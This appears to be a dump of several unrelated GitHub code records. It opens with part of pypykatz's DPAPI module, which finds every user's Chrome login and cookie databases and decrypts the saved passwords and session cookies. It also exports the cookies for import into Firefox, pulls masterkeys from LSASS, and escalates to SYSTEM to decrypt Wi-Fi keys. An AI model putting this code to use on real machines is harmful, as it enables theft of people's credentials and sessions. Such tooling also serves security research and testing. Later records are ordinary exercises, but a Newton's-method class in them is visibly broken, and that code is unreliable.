self.decrypt_securestring_hex(data)\n\t\t\n\t\n\t@staticmethod\n\tdef find_masterkey_files_live():\n\t\twindows_loc = DPAPI.get_windows_dir_live()\n\t\tuser_folder = DPAPI.get_users_dir_live()\n\t\t\n\t\treturn DPAPI.find_masterkey_files_offline(user_folder, windows_loc)\n\t\n\t@staticmethod\n\tdef find_masterkey_files_offline(users_path, windows_path):\n\t\tdef is_guid(fname):\n\t\t\tif os.path.isfile(fname) is True: # fixed: the parameter is now used instead of the enclosing loop variable\n\t\t\t\tbase = ntpath.basename(fname)\n\t\t\t\tif base.find('-') == -1:\n\t\t\t\t\treturn False\n\t\t\t\ttry:\n\t\t\t\t\tbytes.fromhex(base.replace('-',''))\n\t\t\t\texcept:\n\t\t\t\t\treturn False\n\t\t\t\treturn True\n\t\t\treturn False\n\t\t\n\t\tmasterkey_files = {}\n\t\tfor filename in glob.glob(os.path.join(windows_path, \"System32\",\"Microsoft\",\"Protect\", \"**\"), recursive = True):\n\t\t\tif is_guid(filename) is True:\n\t\t\t\tlogger.debug('GUID SYSTEM FILE: %s' % filename)\n\t\t\t\tmasterkey_files[ntpath.basename(filename)] = filename\n\t\t\n\t\tuser_folders = {}\n\t\tfor filename in glob.glob(os.path.join(users_path, '*'), recursive=False):\n\t\t\tif os.path.isdir(filename):\n\t\t\t\tuser_folders[filename] = 1\n\t\t\n\t\tfor subfolder in ['Local', 'Roaming', 'LocalLow']:\n\t\t\tfor user_folder in user_folders:\n\t\t\t\tfor filename in glob.glob(os.path.join(user_folder, \"AppData\", subfolder, \"Microsoft\", \"Protect\", '**'), recursive = True):\n\t\t\t\t\tif is_guid(filename) is True:\n\t\t\t\t\t\tmasterkey_files[ntpath.basename(filename)] = filename\n\t\t\t\t\t\tlogger.debug('GUID USER FILE: %s' 
% filename)\n\t\t\n\t\treturn masterkey_files\n\t\n\t@staticmethod\n\tdef get_users_dir_live():\n\t\tusername = os.environ.get('USERNAME')\n\t\tuserprofile_loc = os.environ.get('USERPROFILE')\n\t\treturn userprofile_loc[:-len(username)]\n\t\n\t@staticmethod\n\tdef get_windows_dir_live():\n\t\treturn os.environ.get('SystemRoot')\n\n\t@staticmethod\n\tdef get_windows_drive_live():\n\t\treturn os.environ.get('SystemDrive')[0]\n\t\n\t@staticmethod\n\tdef find_chrome_database_file_live():\n\t\treturn DPAPI.find_chrome_database_file_offline(DPAPI.get_users_dir_live())\n\t\n\t@staticmethod\n\tdef find_chrome_database_file_offline(users_path):\n\t\tdb_paths = {} # username -> files\n\t\tuser_folders = {} # username -> folder\n\t\t\n\t\tfor filename in glob.glob(os.path.join(users_path, '*'), recursive=False):\n\t\t\tif os.path.isdir(filename):\n\t\t\t\tusername = ntpath.basename(filename)\n\t\t\t\tif username not in user_folders:\n\t\t\t\t\tuser_folders[username] = []\n\t\t\t\tuser_folders[username].append(filename)\n\t\t\t\t\n\t\tfor subfolder_1 in ['Local', 'Roaming', 'LocalLow']:\n\t\t\tfor subfolder_2 in ['', 'Google']:\n\t\t\t\tfor username in user_folders:\n\t\t\t\t\tif username not in db_paths:\n\t\t\t\t\t\tdb_paths[username] = {}\n\t\t\t\t\tfor user_folder in user_folders[username]:\n\t\t\t\t\t\tdb_path = os.path.join(user_folder, 'AppData', subfolder_1, subfolder_2, 'Chrome','User Data','Default','Login Data' )\n\t\t\t\t\t\tif os.path.isfile(db_path) is True:\n\t\t\t\t\t\t\tdb_paths[username]['logindata'] = db_path\n\t\t\t\t\t\t\tlogger.debug('CHROME LOGINS DB FILE: %s' % db_path)\n\n\t\t\t\t\t\tdb_cookies_path = os.path.join(user_folder, 'AppData', subfolder_1, subfolder_2, 'Chrome','User Data','Default','Cookies' )\n\t\t\t\t\t\tif os.path.isfile(db_cookies_path) is True:\n\t\t\t\t\t\t\tdb_paths[username]['cookies'] = db_cookies_path\n\t\t\t\t\t\t\tlogger.debug('CHROME COOKIES DB FILE: %s' % db_cookies_path)\n\n\t\t\t\t\t\tlocalstate_path = os.path.join(user_folder, 'AppData', subfolder_1, subfolder_2, 'Chrome','User Data', 'Local State' )\n\t\t\t\t\t\tif os.path.isfile(localstate_path) is True:\n\t\t\t\t\t\t\tdb_paths[username]['localstate'] = localstate_path\n\t\t\t\t\t\t\tlogger.debug('CHROME localstate FILE: %s' % localstate_path)\n\t\t\t\t\n\t\treturn db_paths\n\t\n\t@staticmethod\n\tdef get_chrome_encrypted_secret(db_path, dbtype):\n\t\tresults = {}\n\t\tresults['logins'] = []\n\t\tresults['cookies'] = []\n\t\tresults['localstate'] = []\n\n\t\ttry:\n\t\t\tconn = sqlite3.connect(db_path)\n\t\t\tcursor = conn.cursor()\n\t\texcept Exception as e:\n\t\t\tlogger.debug('Failed to open chrome DB file %s' % db_path)\n\t\t\treturn results\n\t\t\n\t\tif dbtype.lower() == 'cookies':\n\t\t\ttry:\n\t\t\t\t#totally not stolen from here https://github.com/byt3bl33d3r/chrome-decrypter/blob/master/chrome_decrypt.py\n\t\t\t\tcursor.execute('SELECT host_key, name, path, encrypted_value FROM cookies')\n\t\t\texcept Exception as e:\n\t\t\t\tlogger.debug('Failed to perform query on chrome DB file %s Reason: %s' % (db_path, e))\n\t\t\t\treturn results\n\t\t\t\n\t\t\tfor host_key, name, path, encrypted_value in cursor.fetchall():\n\t\t\t\tresults['cookies'].append((host_key, name, path, encrypted_value))\n\n\t\telif dbtype.lower() == 'logindata':\n\n\t\t\ttry:\n\t\t\t\t#totally not stolen from here https://github.com/byt3bl33d3r/chrome-decrypter/blob/master/chrome_decrypt.py\n\t\t\t\tcursor.execute('SELECT action_url, username_value, password_value FROM 
logins')\n\t\t\texcept Exception as e:\n\t\t\t\tlogger.debug('Failed to perform query on chrome DB file %s Reason: %s' % (db_path, e))\n\t\t\t\treturn results\n\t\t\t\t\n\t\t\tfor url, user, enc_pw in cursor.fetchall():\n\t\t\t\tresults['logins'].append((url, user, enc_pw))\n\t\t\n\t\treturn results\n\t\t\n\tdef decrypt_all_chrome_live(self):\n\t\tdbpaths = DPAPI.find_chrome_database_file_live()\n\t\treturn self.decrypt_all_chrome(dbpaths)\n\t\t\n\t\t\n\tdef decrypt_all_chrome(self, dbpaths, throw = False):\n\t\tfrom unicrypto import get_cipher_by_name\n\t\tAES = get_cipher_by_name('AES', 'cryptography')\n\n\t\tresults = {}\n\t\tresults['logins'] = []\n\t\tresults['cookies'] = []\n\t\tresults['fmtcookies'] = []\n\t\tlocalstate_dec = None\n\n\t\tfor username in dbpaths:\n\t\t\tif 'localstate' in dbpaths[username]:\n\t\t\t\twith open(dbpaths[username]['localstate'], 'r') as f:\n\t\t\t\t\tencrypted_key = json.load(f)['os_crypt']['encrypted_key']\n\t\t\t\t\tencrypted_key = base64.b64decode(encrypted_key)\n\t\t\t\t\n\t\t\t\ttry:\n\t\t\t\t\tlocalstate_dec = self.decrypt_blob_bytes(encrypted_key[5:])\n\t\t\t\texcept:\n\t\t\t\t\tif throw is True:\n\t\t\t\t\t\traise Exception('LocalState decryption failed!')\n\t\t\t\t\t# this localstate was encrypted for another user...\n\t\t\t\t\tcontinue\n\t\t\tif 'cookies' in dbpaths[username]:\n\t\t\t\tsecrets = DPAPI.get_chrome_encrypted_secret(dbpaths[username]['cookies'], 'cookies')\n\t\t\t\tfor host_key, name, path, encrypted_value in secrets['cookies']:\n\t\t\t\t\tif encrypted_value.startswith(b'v10'):\n\t\t\t\t\t\tnonce = encrypted_value[3:3+12]\n\t\t\t\t\t\tciphertext = encrypted_value[3+12:-16]\n\t\t\t\t\t\ttag = encrypted_value[-16:]\n\t\t\t\t\t\tcipher = AES(localstate_dec, MODE_GCM, IV=nonce, segment_size = 16)\n\t\t\t\t\t\tdec_val = cipher.decrypt(ciphertext, b'', tag)\n\t\t\t\t\t\tresults['cookies'].append((dbpaths[username]['cookies'], host_key, name, path, dec_val ))\n\t\t\t\t\t\tresults['fmtcookies'].append(DPAPI.cookieformatter('https://' + host_key, name, path, dec_val))\n\t\t\t\t\telse:\n\t\t\t\t\t\tdec_val = self.decrypt_blob_bytes(encrypted_value)\n\t\t\t\t\t\tresults['cookies'].append((dbpaths[username]['cookies'], host_key, name, path, dec_val ))\n\t\t\t\t\t\tresults['fmtcookies'].append(DPAPI.cookieformatter('https://' + host_key, name, path, dec_val))\n\n\t\t\tif 'logindata' in dbpaths[username]:\n\t\t\t\tsecrets = DPAPI.get_chrome_encrypted_secret(dbpaths[username]['logindata'], 'logindata')\n\t\t\t\tfor url, user, enc_password in secrets['logins']:\n\t\t\t\t\tif enc_password.startswith(b'v10'):\n\t\t\t\t\t\tnonce = enc_password[3:3+12]\n\t\t\t\t\t\tciphertext = enc_password[3+12:-16]\n\t\t\t\t\t\ttag = enc_password[-16:]\n\t\t\t\t\t\tcipher = AES(localstate_dec, MODE_GCM, IV=nonce, segment_size = 16)\n\t\t\t\t\t\tpassword = cipher.decrypt(ciphertext, b'', tag)\n\t\t\t\t\t\tresults['logins'].append((dbpaths[username]['logindata'], url, user, password))\n\t\t\t\t\t\n\t\t\t\t\telse:\n\t\t\t\t\t\tpassword = self.decrypt_blob_bytes(enc_password)\n\t\t\t\t\t\tresults['logins'].append((dbpaths[username]['logindata'], url, user, password))\n\t\t\t\t\n\t\treturn results\n\t\t\n\tdef get_all_masterkeys_live(self):\n\t\ttry:\n\t\t\tself.get_all_keys_from_lsass_live()\n\t\texcept:\n\t\t\tlogger.debug('Failed to get masterkeys/prekeys from LSASS!')\n\t\t\t\n\t\ttry:\n\t\t\tself.get_prekeys_form_registry_live()\n\t\texcept Exception as e:\n\t\t\tlogger.debug('Failed to get masterkeys/prekeys from registry!')\n\t\t\n\t\tmkfiles = 
DPAPI.find_masterkey_files_live()\n\t\tfor guid in mkfiles:\n\t\t\tlogger.debug('Decrypting masterkeyfile with guid: %s location: %s' % (guid, mkfiles[guid]))\n\t\t\tmk, bk = self.decrypt_masterkey_file(mkfiles[guid])\n\t\t\tif len(mk) > 0 or len(bk) > 0:\n\t\t\t\tlogger.debug('Decrypted masterkeyfile with guid: %s location: %s' % (guid, mkfiles[guid]))\n\t\t\telse:\n\t\t\t\tlogger.debug('Failed to decrypt masterkeyfile with guid: %s location: %s' % (guid, mkfiles[guid]))\n\t\t\n\t\treturn self.masterkeys, self.backupkeys\n\t\n\t@staticmethod\n\tdef parse_wifi_config_file(filepath):\n\t\twifi = {}\n\t\ttree = ET.parse(filepath)\n\t\troot = tree.getroot()\n\n\t\tfor child in root:\n\t\t\tif child.tag.endswith('}name'):\n\t\t\t\twifi['name'] = child.text\n\t\t\telif child.tag.endswith('}MSM'):\n\t\t\t\tfor pc in child.iter():\n\t\t\t\t\tif pc.tag.endswith('}keyMaterial'):\n\t\t\t\t\t\twifi['enckey'] = pc.text\n\t\treturn wifi\n\n\t@staticmethod\n\tdef get_all_wifi_settings_offline(system_drive_letter):\n\t\twifis = []\n\t\tfor filename in glob.glob(system_drive_letter+':\\\\ProgramData\\\\Microsoft\\\\Wlansvc\\\\Profiles\\\\Interfaces\\\\**', recursive=True):\n\t\t\tif filename.endswith('.xml'):\n\t\t\t\twifi = DPAPI.parse_wifi_config_file(filename)\n\t\t\t\twifis.append(wifi)\n\t\treturn wifis\n\n\t@staticmethod\n\tdef get_all_wifi_settings_live():\n\t\treturn DPAPI.get_all_wifi_settings_offline(DPAPI.get_windows_drive_live())\n\n\tdef decrypt_wifi_live(self):\n\t\t# key is encrypted as system!!!\n\t\tpm = ProcessManipulator()\n\t\ttry:\n\t\t\ttry:\n\t\t\t\tpm.getsystem()\n\t\t\texcept Exception as e:\n\t\t\t\traise Exception('Failed to obtain SYSTEM privileges! Are you admin? Error: %s' % e)\n\t\t\t\n\t\t\tfor wificonfig in DPAPI.get_all_wifi_settings_live():\n\t\t\t\tyield self.decrypt_wifi_config_file_inner(wificonfig)\n\n\t\tfinally:\n\t\t\tpm.dropsystem()\n\n\tdef decrypt_wifi_config_file_inner(self, wificonfig):\n\t\tif 'enckey' in wificonfig and wificonfig['enckey'] != '':\n\t\t\twificonfig['key'] = self.decrypt_securestring_hex(wificonfig['enckey'])\n\t\t\treturn wificonfig\n\t\n\tdef decrypt_wifi_config_file(self, configfile):\n\t\twificonfig = DPAPI.parse_wifi_config_file(configfile)\n\t\treturn self.decrypt_wifi_config_file_inner(wificonfig)\n\t\n\t@staticmethod\n\tdef cookieformatter(host, name, path, content):\n\t\t\"\"\"This is the data format the 'Cookie Quick Manager' uses to load cookies in FireFox\"\"\"\n\t\treturn {\n\t\t\t\"Host raw\": host, #\"https://.pkgs.org/\",\n\t\t\t\"Name raw\": name, #\"distro_id\",\n\t\t\t\"Path raw\": path, #\"/\",\n\t\t\t\"Content raw\": content, # \"196\",\n\t\t\t\"Expires\": \"26-05-2022 21:06:29\", # \"12-05-2022 15:59:48\",\n\t\t\t\"Expires raw\": \"1653591989\", # \"1652363988\",\n\t\t\t\"Send for\": \"Any type of connection\", #\"Encrypted connections only\",\n\t\t\t\"Send for raw\": False, #\"true\",\n\t\t\t\"HTTP only raw\": False, #\"false\",\n\t\t\t\"SameSite raw\": \"lax\", #\"lax\",\n\t\t\t\"This domain only\": False, #\"Valid for subdomains\",\n\t\t\t\"This domain only raw\": False, #\"false\",\n\t\t\t\"Store raw\": \"firefox-default\", #\"firefox-default\",\n\t\t\t\"First Party Domain\": \"\", #\"\"\n\t\t}\n\t\n\tdef decrypt_cloudap_key(self, keyvalue_url_b64):\n\t\tkeyvalue = base64_decode_url(keyvalue_url_b64, bytes_expected=True)\n\t\tkeyvalue = keyvalue[8:] # skip the first 8 bytes\n\t\tkey_blob = DPAPI_BLOB.from_bytes(keyvalue)\n\t\treturn self.decrypt_blob(key_blob)\n\t\n\tdef decrypt_cloudapkd_prt(self, 
PRT):\n\t\tprt_json = json.loads(PRT)\n\t\tkeyvalue = prt_json.get('ProofOfPossesionKey',{}).get('KeyValue')\n\t\tif keyvalue is None:\n\t\t\traise Exception('KeyValue not found in PRT')\n\n\t\tkeyvalue_dec = self.decrypt_cloudap_key(keyvalue)\n\t\treturn keyvalue_dec\n\n\n\n# argparse helper\ndef prepare_dpapi_live(methods = [], mkf = None, pkf = None):\n\tdpapi = DPAPI()\n\t\n\tif mkf is not None:\n\t\tdpapi.load_masterkeys(mkf)\n\tif pkf is not None:\n\t\tdpapi.load_prekeys(pkf)\n\t\n\tif 'all' in methods:\n\t\tdpapi.get_all_masterkeys_live()\n\tif 'registry' in methods and 'all' not in methods:\n\t\tdpapi.get_prekeys_form_registry_live()\n\tif 'lsass' in methods and 'all' not in methods:\n\t\tdpapi.get_masterkeys_from_lsass_live()\n\t\n\treturn dpapi\n\ndef main():\n\tmkffile = '/mnt/hgfs/!SHARED/feature/masterkeyfile - 170d0d57-e0ae-4877-bab6-6f5af49d3e8e'\n\tpvkfile = '/mnt/hgfs/!SHARED/feature/pvkfile - ntds_capi_0_fdf0c850-73d3-48cf-86b6-6beb609206c3.keyx.rsa.pvk'\n\tdpapi = DPAPI()\n\tdpapi.decrypt_masterkey_file_with_pvk(mkffile, pvkfile)\n\n\nif __name__ == '__main__':\n\tmain()","repo_name":"skelsec/pypykatz","sub_path":"pypykatz/dpapi/dpapi.py","file_name":"dpapi.py","file_ext":"py","file_size_in_byte":32577,"program_lang":"python","lang":"en","doc_type":"code","stars":2505,"dataset":"github-code","pt":"53"} +{"seq_id":"38282472655","text":"# your task is to complete this function\n# function should return head after partition of the list\ndef partitionlist(head,x):\n    curr=head\n    lesser=lesserhead=node(0)\n    greater=greaterhead=node(0)\n    while(curr):\n        if curr.data<x:\n            lesser.next=curr\n            lesser=lesser.next\n        else:\n            greater.next=curr\n            greater=greater.next\n        curr=curr.next\n    greater.next=None\n    lesser.next=greaterhead.next\n    return lesserhead.next\n    # Code here\n\n\n\n#{ \n# Driver Code Starts\n# Node Class \nclass node:\n    def __init__(self, val):\n        self.data = val\n        self.next = None\n    \n# Linked List Class\nclass Linked_List:\n    def __init__(self):\n        self.head = None\n\n    def insert(self, val):\n        if self.head == None:\n            self.head = node(val)\n        else:\n            new_node = node(val)\n            temp = self.head\n            while(temp.next):\n                temp=temp.next\n            temp.next = new_node\n\ndef createList(arr, n):\n    lis = Linked_List()\n    for i in range(n):\n        lis.insert(arr[i])\n    return lis.head\n\nif __name__=='__main__':\n    t = int(input())\n    for i in range(t):\n        n = int(input())\n        arr = list(map(int, input().strip().split()))\n        x = int(input())  # partition value; the original driver called an undefined helper from another problem\n        head = createList(arr, n)\n        head = partitionlist(head, x)\n        while head:\n            print(head.data, end=' ')\n            head = head.next\n        print()\n# Contributed by: Harshit Sidhwa\n# } Driver Code Ends\n","repo_name":"AprajitaChhawi/365DaysOfCode.JANUARY","sub_path":"Day 20 partition list around x.py","file_name":"Day 20 partition list around x.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4755926768","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2023/7/9 16:22\n# @Author : streamer\n# @File : config.py\n# @Project : celery_demo\n# @Software: PyCharm\n# @History : \n# VERSION USER DATE DESC\n# v1.0.0 Streamer 2023/7/9 CREATE\nbroker_url='redis://localhost:6379/0'\nresult_backend='mongodb://localhost:27017/'\nmongodb_backend_settings={\n    'database': 'my_test',\n    'taskmeta_collection': 'hello_celery',\n}","repo_name":"lightflyer/celery_demo","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
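The pypykatz record above spells out the decryption chain in its module docstring; the short sketch below ties the first three steps together. It assumes pypykatz is installed, and the SID, password and file paths are made-up placeholders, not values from the record.

from pypykatz.dpapi.dpapi import DPAPI

dpapi = DPAPI()
# step 1: pre_masterkey from a user password and SID
dpapi.get_prekeys_from_password('S-1-5-21-111-222-333-1001', password='Passw0rd!')
# step 2: masterkey -- every cached prekey is tried against the masterkey file
dpapi.decrypt_masterkey_file('/path/to/masterkeyfile')
# step 3: the credential file decrypts once the matching masterkey is cached
print(dpapi.decrypt_credential_file('/path/to/credential_file'))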
+{"seq_id":"9495873542","text":"# 주어진 데이터 셋에서 age컬럼 상위 20개의 데이터를 구한 다음 \n# f1의 결측치를 중앙값으로 채운다.\n# 그리고 f4가 ISFJ와 f5가 20 이상인 \n# f1의 평균값을 출력하시오!\n\n# - 데이터셋 : basic1.csv \n# - 오른쪽 상단 copy&edit 클릭 -> 예상문제 풀이 시작\n# - File -> Editor Type -> Script\n\nimport pandas as pd\nimport numpy as np\ndf = pd.read_csv('../input/bigdatacertificationkr/basic1.csv')\n\n# 주어진 데이터 셋에서 age컬럼 상위 20개의 데이터\ndf_20 = df.sort_values(by = 'age', ascending = False).reset_index(drop = True).iloc[0:20,:]\n\n# f1의 결측치를 중앙값으로 대체\ndf_20.f1 = df_20.f1.fillna(df_20.f1.median())\n\n# f4가 ISFJ와 f5가 20 이상인 f1의 평균값\nprint(df_20[(df_20.f4 == 'ISFJ')&(df_20.f5>=20)].f1.mean())\n\n# 정답 : 73.875\n\n\n# kaggle answer\n\nimport pandas as pd\n\n# 데이터 불러오기\ndf = pd.read_csv(\"../input/bigdatacertificationkr/basic1.csv\")\n\n# 나이 순(내림차순)으로 정렬\ndf = df.sort_values('age', ascending=False).reset_index(drop=True)\nprint(df)\n\n# 상위 20개 슬라이싱\ndf = df[:20]\nprint(df)\n\n# 결측치 채우기 (중앙값)\ndf['f1'] = df['f1'].fillna(df['f1'].median())\n\n# 조건 ISFJ, f5가 20이상\ncond = (df['f4']=='ISFJ') & (df['f5'] >= 20)\n\n# f1의 평균\ndf[cond]['f1'].mean()\n\n# 정답 : 73.875\n","repo_name":"wjdghwo/Big-Data-Certification-KR","sub_path":"py-t1-15_expected_question.py","file_name":"py-t1-15_expected_question.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"29518116515","text":"\"\"\"\r\nLab de Alg. e programação 17\r\nLuiz Guilherme de Andrade Pires - ECI\r\nDRE -> 121070338\r\ndata: 24/09/2021\r\n\"\"\"\r\n\r\nclass metodo_newton:\r\n def __init__(self, coeficientes, x0, n):\r\n self.coeficientes = coeficientes\r\n self.x0 = x0\r\n self.n = n\r\n \r\n def func_x(self, x):\r\n soma = []\r\n for i in range(len(self.coeficientes)):\r\n s = self.coeficientes[i] * x ** i\r\n soma.append(s)\r\n return sum(soma)\r\n \r\n def der_x(self, x):\r\n soma = []\r\n for i in range(len(1,self.coeficientes)):\r\n s = i * self.coeficientes[i] * x ** (i-1)\r\n soma.append(s)\r\n return sum(soma)\r\n\r\n def raiz(self):\r\n xa = self.x0\r\n xn = 0 \r\n for _ in range(self.n):\r\n try:\r\n xn = xa - (self.func_x(xa)/self.der_x(xa))\r\n xa = xn\r\n \r\n except ZeroDivisionError:\r\n return (\"Abortado\")\r\n \r\n return (func_x(xa), xa)\r\n \r\n\r\n\r\na = metodo_newton([3,2], 2, 1)\r\nprint(a.raiz)\r\n\r\n\r\n \r\n ","repo_name":"ziuLGAP/2021.1-UFRJ","sub_path":"lab_ex17.py","file_name":"lab_ex17.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35228109466","text":"import os\nimport pprint\n\nfrom docker import DockerClient\nfrom docker.errors import APIError, BuildError, ContainerError\n\ndocker_client = DockerClient(base_url=\"unix://var/run/docker.sock\", timeout=600)\n\n\ndef build_image(image_conf, image_fullname, dockerfile_directory, dockerfile_path, debug):\n print(\"> [Info] Building: \" + image_fullname)\n try:\n if debug:\n pp = pprint.PrettyPrinter(indent=1)\n print(\">> Building configuration: \")\n pp.pprint(image_conf)\n print(\"\\n\")\n print(\">> Dockerfile directory: \")\n print(dockerfile_directory)\n print(\"\\n\")\n print(\">> Dockerfile relative path: \")\n print(dockerfile_path)\n print(\"\\n\")\n\n docker_client.images.build(\n path=dockerfile_directory,\n dockerfile=dockerfile_path,\n tag=image_fullname,\n quiet=True,\n nocache=True,\n buildargs=image_conf[\"build_args\"] if \"build_args\" in image_conf else {},\n forcerm=True,\n )\n print(\"Build 
successful\")\n except BuildError as build_error:\n print(\"> [Error] Build failed\\n\")\n for line in build_error.build_log:\n if \"stream\" in line:\n print(line[\"stream\"].strip())\n exit(1)\n except APIError as api_error:\n print(\"> [Error] API error - \" + str(api_error))\n exit(1)\n\n\ndef run_image(image_fullname, image_conf, debug):\n volume = {}\n\n print(\"> [Info] Testing \" + image_fullname)\n\n try:\n if \"test_config\" in image_conf:\n test_config = image_conf[\"test_config\"]\n if \"volume\" in test_config:\n # Split path:directory string and build volume dict\n splitted_volume = test_config[\"volume\"].split(\":\")\n volume[f\"{os.getcwd()}/{splitted_volume[0]}\"] = {\n \"bind\": splitted_volume[1],\n \"mode\": \"ro\",\n }\n for cmd in test_config[\"cmd\"]:\n if debug:\n print(\">> Running test: \" + cmd)\n container = docker_client.containers.run(\n image=image_fullname,\n command=cmd,\n volumes=volume,\n stdout=True,\n stderr=True\n )\n if debug:\n for line in container.decode('utf-8').split('\\n'):\n print(line)\n print(\"Tests successful\")\n except ContainerError as container_error:\n print(f\"'{container_error.command}' command failed\")\n for line in container_error.stderr.decode('utf-8').split('\\n'):\n print(line)\n exit(1)\n except APIError as api_error:\n print(\"> [Error] Command test failed - \" + str(api_error))\n exit(1)\n finally:\n docker_client.containers.prune()\n\n\ndef login_to_registry(env_conf):\n print(\"> [Info] Login to registry\")\n try:\n docker_client.login(\n username=env_conf[\"docker_reg_username\"], password=env_conf[\"docker_reg_password\"]\n )\n print(\"Login successful\")\n except APIError as api_error:\n print(\"> [Error] Login failed - \" + str(api_error))\n exit(1)\n\n\ndef push_image(image_fullname):\n print(\"> [Info] Pushing \" + image_fullname)\n try:\n for line in docker_client.images.push(image_fullname, stream=True, decode=True):\n # Keep 1st and last line of push cmd\n if \"status\" in line and \"progressDetail\" not in line:\n print(f\"{line['status']}\")\n if \"error\" in line:\n print(line[\"error\"])\n exit(1)\n print(\"Push successful\")\n except APIError as api_error:\n print(\"> [Error] Push failed - \" + str(api_error))\n exit(1)\n","repo_name":"ekinoben/docker-buildbox","sub_path":"src/docker_image.py","file_name":"docker_image.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"17441270054","text":"# 3.\nT = int(input())\n# 여러개의 테스트 케이스가 주어지므로, 각각을 처리합니다.\nfor test_case in range(1, T + 1):\n n=int(input())\n num = input()\n score = [0]*10\n for i in range(n):\n i = int(num[i])\n score[i] += 1\n m = max(score)\n for i in range(9,0,-1):\n if score[i] == m:\n break\n print('#{} {} {}'.format(test_case, i, m))","repo_name":"dodoyeon/SW_Academy","sub_path":"list1/max_num.py","file_name":"max_num.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74897196967","text":"import math\n\nnum = int(input())\nlist = [] # input 정수들\nlist2 = [] # 최대공약수의 약수들\ngcd = 0 # 01,12를 각각 뺀 최대공약수\nfor i in range(num):\n list.append(int(input()))\n if i == 1:\n gcd = abs(list[1] - list[0])\n gcd = math.gcd(abs(list[i] - list[i - 1]), gcd)\ngcd_a = int(gcd ** 0.5)\n\nfor i in range(2, gcd_a + 1):\n if gcd % i == 0:\n if i not in list2:\n list2.append(i)\n if gcd // i not in list2:\n list2.append(gcd // i)\n\nlist2.append(gcd)\nlist2.sort()\n# list2 = 
+{"seq_id":"74897196967","text":"import math\n\nnum = int(input())\nlist = [] # input integers\nlist2 = [] # divisors of the GCD\ngcd = 0 # GCD of the pairwise differences (x1-x0, x2-x1, ...)\nfor i in range(num):\n    list.append(int(input()))\n    if i == 1:\n        gcd = abs(list[1] - list[0])\n    gcd = math.gcd(abs(list[i] - list[i - 1]), gcd)\ngcd_a = int(gcd ** 0.5)\n\nfor i in range(2, gcd_a + 1):\n    if gcd % i == 0:\n        if i not in list2:\n            list2.append(i)\n        if gcd // i not in list2:\n            list2.append(gcd // i)\n\nlist2.append(gcd)\nlist2.sort()\n# list2 = sorted(list2)\n\nfor i in list2:\n    print(i, end=' ')\n","repo_name":"chjwon/BOJ_answer_py","sub_path":"2000/2981.py","file_name":"2981.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10731304358","text":"import config, utils\nfrom tqdm.auto import tqdm\nimport pandas as pd\nimport nltk\nimport os\n\n\ndef break_row_by_sentence(row: pd.Series):\n    row['text'] = nltk.sent_tokenize(row['text'])\n    return row\n\n\ndef break_dataset_by_sentence(dataset: pd.DataFrame):\n    return dataset.progress_apply(break_row_by_sentence, axis=1)\n\n\ndef break_data_by_sentence():\n    nltk.download('punkt')\n    utils.prepare_directory(config.sentencebroken_data_directory)\n\n    datasets = utils.get_datasets(\n        config.clean_data_directory,\n        desc='Loading datasets',\n        verbose=True\n    )\n    for category, dataset in tqdm(\n        datasets.items(),\n        desc='Breaking datasets by sentence',\n        ncols=config.tqdm_ncols,\n        position=0,\n        leave=True\n    ):\n        sentencebroken_filename = utils.get_filename(category, ext='csv')\n        sentencebroken_filepath = os.path.join(\n            config.sentencebroken_data_directory,\n            sentencebroken_filename\n        )\n        if os.path.exists(sentencebroken_filepath) and not config.sentbreak_overwrite:\n            continue\n\n        tqdm.pandas(desc=category, position=1, ncols=config.tqdm_ncols, leave=False)\n        sentencebroken_dataset = break_dataset_by_sentence(dataset)\n        sentencebroken_dataset.to_csv(\n            sentencebroken_filepath,\n            mode='w', index=False\n        )\n\n    print('Finished breaking datasets by sentence!')\n\n\nif __name__ == '__main__':\n    break_data_by_sentence()","repo_name":"DiyarH/nlp1402project","sub_path":"src/dataset/sent_break.py","file_name":"sent_break.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27459790321","text":"\"\"\"\nDivide and Conquer:\n\n399 - Longest Common Sequence Problem\n- S1 and S2 are given strings\n- Find the length of the longest subsequence which is common to both strings\n- Subsequence: a sequence that can be derived from another sequence by deleting some elements without changing the order of the remaining elements\nExample:\n- s1 = \"elephant\"\n- s2 = \"erepat\"\n- output = 5\n- longest common subsequence: \"eepat\"\n\"\"\"\n\n\ndef findLongestCommonSequence(s1: str, s2: str, index1: int, index2: int) -> int:\n    if index1 >= len(s1) or index2 >= len(s2):\n        return 0\n\n    if s1[index1] == s2[index2]:\n        return 1 + findLongestCommonSequence(s1, s2, index1 + 1, index2 + 1)\n    else:\n        b = findLongestCommonSequence(s1, s2, index1, index2 + 1)\n        c = findLongestCommonSequence(s1, s2, index1 + 1, index2)\n\n        return max(b, c)\n\n\ns1 = \"elephant\"\ns2 = \"erepat\"\nprint(findLongestCommonSequence(s1, s2, 0, 0))\n\n\ndef findLongestCommonSequenceString(s1: str, s2: str, index1: int, index2: int) -> str:\n    if index1 >= len(s1) or index2 >= len(s2):\n        return \"\"\n\n    if s1[index1] == s2[index2]:\n        return s1[index1] + findLongestCommonSequenceString(s1, s2, index1 + 1, index2 + 1)\n    else:\n        b = findLongestCommonSequenceString(s1, s2, index1, index2 + 1)\n        c = findLongestCommonSequenceString(s1, s2, index1 + 1, index2)\n\n        return b if len(b) > len(c) else c\n\nprint(findLongestCommonSequenceString(s1, s2, 0, 
